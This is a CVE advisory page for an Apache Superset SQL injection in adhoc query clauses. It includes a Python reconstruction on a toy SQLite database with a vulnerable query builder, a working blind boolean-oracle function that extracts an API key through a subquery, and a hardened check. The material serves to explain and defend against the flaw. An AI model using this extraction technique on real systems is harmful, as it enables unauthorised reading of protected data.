History: Jan 16, 2023 - 10:14 a.m.

CVE-2022-41703 Apache Superset: SQL injection vulnerability in adhoc clauses

2023-01-16 10:14:01
apache
www.cve.org
8
apache superset
sql alchemy connector
sql injection

AI Score: 5.7
Confidence: High
EPSS: 0.001
Percentile: 29.0%

A vulnerability in the SQL Alchemy connector of Apache Superset allows an authenticated user with read access to a specific database to add subqueries to the WHERE and HAVING fields of adhoc clauses that reference tables in the same database which the user should not have access to, even when the feature flag "ALLOW_ADHOC_SUBQUERY" is disabled (its default value). This issue affects Apache Superset versions 1.5.2 and earlier, and version 2.0.0. Because the bypass works with the flag already at its default setting, leaving or switching the flag off is not a mitigation; the affected-version data below lists every 1.x release up to and including 1.5.2 as affected and, in the 2.0 line, only 2.0.0 (releases from 2.0.1 onward are not listed as affected), so upgrading is the fix.
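The following is an added example, not code from Apache Superset or from this advisory. It reconstructs the class of bug described above on an in-memory SQLite database with a constructed schema: a `sales` table the user may read and a `credentials` table they may not. `build_query_unchecked` shows the vulnerable pattern (the adhoc WHERE clause spliced into the query verbatim), `recover_api_key` shows why it matters (a subquery in the clause turns the chart into a character-by-character boolean oracle against the forbidden table), and `build_query_checked` shows a hardened variant that refuses clauses containing a subquery while the flag is off. The table names, the key value, the function names and the `contains_subquery` check are all assumptions for illustration; the check is a simplified stand-in and not Superset's own parser-based validation. The same reasoning applies to a HAVING clause.

```python
import re
import sqlite3

# Assumption: mirrors the default (disabled) state of Superset's
# ALLOW_ADHOC_SUBQUERY feature flag named in the advisory.
ALLOW_ADHOC_SUBQUERY = False

# Constructed sample schema (not real data): the user is allowed to read
# `sales` but must not be able to read `credentials`.
SCHEMA = """
CREATE TABLE sales (region TEXT, amount INTEGER);
INSERT INTO sales VALUES ('north', 120), ('north', 80), ('south', 50);
CREATE TABLE credentials (owner TEXT, api_key TEXT);
INSERT INTO credentials VALUES ('admin', 'k7Qz');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_query_unchecked(table, adhoc_where):
    """Vulnerable pattern: the user-supplied adhoc clause is appended as-is,
    so anything SQL permits inside a WHERE clause, including a subquery
    against another table in the same database, reaches the engine."""
    return (f"SELECT region, SUM(amount) AS total FROM {table} "
            f"WHERE {adhoc_where} GROUP BY region")


# Things that may legitimately contain the word SELECT without forming a
# subquery: string literals, quoted identifiers and comments.
_LITERAL_OR_COMMENT = re.compile(
    r"'(?:[^']|'')*'"      # single-quoted string literal ('' escapes a quote)
    r'|"(?:[^"]|"")*"'     # double-quoted identifier
    r"|--[^\n]*"           # line comment
    r"|/\*.*?\*/",         # block comment
    re.DOTALL,
)
_SELECT = re.compile(r"\bselect\b", re.IGNORECASE)


def contains_subquery(clause):
    """Simplified stand-in check (hypothetical, not Superset's): once literals,
    quoted identifiers and comments are blanked out, a bare SELECT keyword in a
    WHERE/HAVING predicate can only be a subquery."""
    stripped = _LITERAL_OR_COMMENT.sub(" ", clause)
    return _SELECT.search(stripped) is not None


def build_query_checked(table, adhoc_where, allow_subquery=ALLOW_ADHOC_SUBQUERY):
    """Hardened variant: honour the flag before the clause is spliced in."""
    if not allow_subquery and contains_subquery(adhoc_where):
        raise ValueError("subqueries are not allowed in adhoc clauses")
    return build_query_unchecked(table, adhoc_where)


def recover_api_key(conn, alphabet="abcdefghijklmnopqrstuvwxyz"
                                   "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
                    max_len=32):
    """Abuse the unchecked builder as a boolean oracle: the chart returns a
    'north' row only when the guessed character of the admin key is right.
    Nothing from `credentials` is ever selected directly; the leak rides on
    whether the allowed table's rows survive the WHERE clause."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            clause = (
                "region = 'north' AND "
                f"(SELECT substr(api_key, {pos}, 1) FROM credentials "
                f"WHERE owner = 'admin') = '{ch}'"
            )
            rows = conn.execute(build_query_unchecked("sales", clause)).fetchall()
            if rows:
                recovered += ch
                break
        else:
            break  # no character matched: end of the key
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via adhoc subquery:", recover_api_key(db))
    try:
        build_query_checked("sales", "1=1 OR (SELECT 1 FROM credentials) = 1")
    except ValueError as exc:
        print("hardened builder rejected the clause:", exc)
```

The oracle needs only the presence or absence of a result row, which is exactly what a chart with a user-controlled adhoc filter exposes; the check is deliberately conservative, rejecting any clause with a SELECT keyword outside literals and comments rather than trying to decide which subqueries are harmless.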

CNA Affected

[
  {
    "defaultStatus": "unaffected",
    "product": "Apache Superset",
    "vendor": "Apache Software Foundation",
    "versions": [
      {
        "lessThan": "2.0.1",
        "status": "affected",
        "version": "2.0.0",
        "versionType": "semver"
      },
      {
        "lessThanOrEqual": "1.5.2",
        "status": "affected",
        "version": "0",
        "versionType": "semver"
      }
    ]
  }
]

